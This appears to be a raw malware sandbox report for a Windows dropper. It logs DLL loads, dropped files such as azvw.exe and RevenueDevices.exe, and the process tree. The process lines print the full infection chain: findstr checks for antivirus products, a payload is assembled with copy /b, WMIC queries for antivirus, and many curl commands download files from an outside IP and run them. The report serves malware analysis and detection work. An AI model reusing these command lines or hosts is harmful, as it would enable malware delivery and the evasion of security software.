Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: vqMMwqCFZQ.exeStatic file information: File size 1069345 > 1048576
Source: vqMMwqCFZQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, nircmdc.exe.50.dr
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: 7zxa.dll.50.drStatic PE information: section name: .sxdata
Source: 7za.dll.50.drStatic PE information: section name: .sxdata
Source: 7za.exe.50.drStatic PE information: section name: .sxdata
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004080D0 push dword ptr [edi+ecx-75h]; retf 50_2_004080DA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041B280 push eax; ret 50_2_0041B2AE
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00407E8F push dword ptr [edi+ecx-75h]; retf 50_2_00407E99
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139918\Ur.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exeJump to dropped file
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_50-14249
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pif TID: 3468Thread sleep time: -15120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,50_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004107A0 FindFirstFileA,50_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_004062D5 FindFirstFileW,FindClose,86_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00402E18 FindFirstFileW,86_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,86_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139918\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139918Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: curl.exe, 00000040.00000003.2845869310.0000000003280000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000059.00000003.3065458553.0000000003080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: curl.exe, 00000020.00000003.2621923061.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.2639184295.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000061.00000003.3105199413.0000000003590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: curl.exe, 0000002F.00000003.2756663510.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: curl.exe, 00000016.00000003.2519800125.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001A.00000003.2589094875.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000003.2605564917.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000003.2666266763.0000000003210000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.2685688683.0000000003260000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002C.00000003.2702350921.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000035.00000003.2782045185.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000038.00000003.2799289711.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000043.00000003.2876292137.0000000003221000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000046.00000003.2895039416.0000000003550000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000049.00000003.2912432151.0000000000D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004125F0 LeaveCriticalSection,CreateFileA,EnterCriticalSection,CreateFileA,GetKernelObjectSecurity,GetKernelObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetKernelObjectSecurity,SetKernelObjectSecurity,GetProcessHeap,HeapFree,CloseHandle,CreateFileA,CloseHandle,50_2_004125F0
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139918Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SyntaxMilesImperialTriple" Credits Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps vJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139918\Ur.pif Ur.pif vJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zipJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
